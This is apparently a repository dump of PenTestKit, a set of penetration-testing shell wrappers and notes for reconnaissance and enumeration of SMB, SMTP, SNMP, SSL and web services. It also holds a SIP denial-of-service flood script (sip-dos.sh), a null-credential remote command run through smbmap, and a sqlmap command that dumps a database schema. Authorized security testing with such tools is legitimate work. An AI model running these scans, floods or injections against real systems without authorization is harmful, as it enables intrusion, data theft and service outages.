17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/README.md:
--------------------------------------------------------------------------------
 1 | # Dependencies
 2 | You need to install shodan with pip install shodan or easy_install shodan.<br />
 3 | You need to install python-nmap with pip install python-nmap.<br />
 4 | You need to set your API Key in the 'constantes.py' file.
 5 | 
 6 | # Options
 7 | -h, --help                 show this help message and exit<br />
 8 | -i IP, --ip=IP             info about one host<br />
 9 | -l LIST, --list=LIST       info about a list of hosts<br />
10 | -s SQ, --sq=SQ             searchquery string<br />
11 | --nmap                     perform a nmap scan in the hosts<br />
12 | --setkey=SETKEY		       set your api key automatically<br />
13 | -r RANGE, --range=RANGE    scan a range of ips. ex: 192.168.1.1-192.168.1.255<br />
14 | -o OUTPUT, --output=OUTPUT specify a output file<br /><br />
15 | 
16 | Nmap Options:<br />
17 | --sS                  TCP Syn Scan<br />
18 | --sT                  TCP Connect Scan<br />
19 | --sU                  UDP Scan
20 | 
21 | # Usage
22 | <em>For One Host<em><br />
23 | python shodanhat.py -i IP<br />
24 | <em>For a list of Hosts</em><br />
25 | python shodanhat.py -l list.txt<br />
26 | You can also set a searchquery to make a specific query with '-s' option!
27 | 
28 | # ScreenShots
29 | <img src="http://i.imgur.com/J4aAHov.jpg" /><br />
30 | <img src="http://i.imgur.com/q3YTHm8.jpg" />


--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maldevel/PenTestKit/45ab5a4e2f5ad007b5ac8832d35d03edb5a2cc27/reconnaissance/shodan/shodanhat/__init__.py


--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/constantes.py:
--------------------------------------------------------------------------------
1 | SHODAN_API_KEY = ""


--------------------------------------------------------------------------------
/reconnaissance/smtp-banner.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | msfconsole -n -q -r - << EOF
27 | use auxiliary/scanner/smtp/smtp_version
28 | set RHOSTS $1
29 | run
30 | exit
31 | EOF
32 | else
33 |     echo "Please provide the target smtp server."
34 | fi
35 | 


--------------------------------------------------------------------------------
/reconnaissance/webrecon.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	python web-reconnaissance.py -u $1 -o $2
27 | 	pandoc -s -o $2.html $2
28 | 	xdg-open $2.html
29 | else
30 |     echo "Please provide the target url and a filepath to save logs."
31 | fi
32 | 


--------------------------------------------------------------------------------
/reconnaissance/whois.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	while read line || [[ -n "$line" ]]; do
27 | 		echo "Whois Lookup - $line"
28 | 		whois $line > "whois-$line.txt"
29 | 	done < "$1"
30 | else
31 |     echo "Please provide a file containing a list of target hosts."
32 | fi
33 | 


--------------------------------------------------------------------------------
/reconnaissance/zone-transfer.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	host -l $1 $2
27 | else
28 |     echo "Please provide a target host and a nameserver."
29 | fi
30 | 


--------------------------------------------------------------------------------
/sip/scanner-svwar.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 |     svwar -D -m INVITE -p $2 $1
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/sip/sip-dos.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 4 ]; then
26 |     svwar -D -m INVITE -p $2 $1
27 |     sudo inviteflood $2 $3 $1 $1 -a "$4" 1000000000
28 | else
29 |     echo "Please provide the target host, network interface, internal phone number and an alias."
30 | fi
31 | 


--------------------------------------------------------------------------------
/skid/README.md:
--------------------------------------------------------------------------------
 1 | ## README
 2 | 
 3 | ### SKID mode
 4 | 
 5 | ```
 6 | chmod a+x -R PenTestKit/grep
 7 | chmod a+x -R PenTestKit/live-hosts
 8 | chmod a+x -R PenTestKit/generate-scripts-lists
 9 | chmod a+x scan-external-ip-range.sh
10 | sudo ./scan-external-ip-range.sh x.x.x.x/yy
11 | ```
12 | 
13 | ---
14 | 


--------------------------------------------------------------------------------
/smb/null-session.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	rpcclient -U "" -N $1
27 | else
28 |     echo "Please provide a target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/smb/scan-enum4linux.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	enum4linux -a -v -M -l -d $1 2>&1 | tee "enum4linux_$1.txt"
27 | else
28 |     echo "Please provide the target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/smb/scan-execute-command.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	smbmap -H $1 -P $2 -x "ipconfig /all" 2>&1 | tee -a "smbmap-execute-command_$1_$2.txt"; smbmap -u null -p "" -H $1 -P $2 -x "ipconfig /all" 2>&1 | tee -a "smbmap-execute-command_$1_$2.txt"
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/smb/scan-list-contents.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	smbmap -H $1 -P $2 -R 2>&1 | tee -a "smbmap-list-contents_$1_$2.txt"; smbmap -u null -p "" -H $1 -P $2 -R 2>&1 | tee -a "smbmap-list-contents_$1_$2.txt"
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/smb/scan-nbtscan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	nbtscan -rvh $1 2>&1 | tee "nbtscan_$1.txt"
27 | else
28 |     echo "Please provide the target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/smb/scan-share-permissions.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	smbmap -H $1 -P $2 2>&1 | tee -a "smbmap-share-permissions_$1_$2.txt"; smbmap -u null -p "" -H $1 -P $2 2>&1 | tee -a "smbmap-share-permissions_$1_$2.txt"
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/smb/scan-smbclient.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	smbclient -L\\ -N -I $1 2>&1 | tee "smbclient_$1.txt"
27 | else
28 |     echo "Please provide the target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/smtp/user-enum.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t $1 -p $2 2>&1 | tee "smtp_user-enum_$1_$2.txt"
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/snmp/community.lst:
--------------------------------------------------------------------------------
1 | public 
2 | private 
3 | manager
4 | 


--------------------------------------------------------------------------------
/snmp/discover.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	nmap -sU --open -p 161 $1
27 | else
28 |     echo "Please provide a target host or a target ip range."
29 | fi
30 | 


--------------------------------------------------------------------------------
/snmp/scan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd $1 2>&1 | tee "snmp_onesixtyone_$1.txt"
27 | else
28 |     echo "Please provide a target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/sqli/sqlmap.md:
--------------------------------------------------------------------------------
 1 | ## SQLmap notes
 2 | 
 3 | ### Get database schema
 4 | 
 5 | * Microsoft SQL Server
 6 | * Error-base
 7 | * POST
 8 | * Burp Pro proxy
 9 | * Specific database
10 | 
11 | ```bash
12 | sqlmap -v3 -u https://example.com --method=POST --data="post-request-data" --proxy=http://127.0.0.1:8080 -p <vulnerable_parameter> --os=Windows --technique=E --dbms="Microsoft SQL Server" --schema --dump-format=CSV -D dbname
13 | ```
14 | 
15 | 


--------------------------------------------------------------------------------
/ssl/ssl-scan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     sslscan --show-certificate --verbose --no-colour --xml=sslscan_$1_$2.xml $1:$2 2>&1 | tee "$1_$2_sslscan.txt"
26 | else
27 |     echo "Please provide the target ip address and the port."
28 | fi
29 | 


--------------------------------------------------------------------------------
/ssl/tlssled.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2025 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 2 ]; then
25 |     tlssled $1 $2
26 | else
27 |     echo "Please provide the host and the port."
28 | fi
29 | 


--------------------------------------------------------------------------------
/web/banner-grabbing-curl-http-proxy.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	curl -I -i -X HEAD -x "$1" --insecure "$2"
27 | else
28 |     echo "Please provide a proxy server and a target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/banner-grabbing-curl-http.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	curl -s -I -i -X HEAD --insecure "$1"
27 | else
28 |     echo "Please provide a target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/banner-grabbing-nc-http.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	echo -e 'HEAD / HTTP/1.0\r\n\r\n' | nc $1 $2
27 | else
28 |     echo "Please provide the target host and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/banner-grabbing-nc.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	nc -v $1 $2
27 | else
28 |     echo "Please provide a target host and a port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/banner-grabbing-nmap-built-in.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
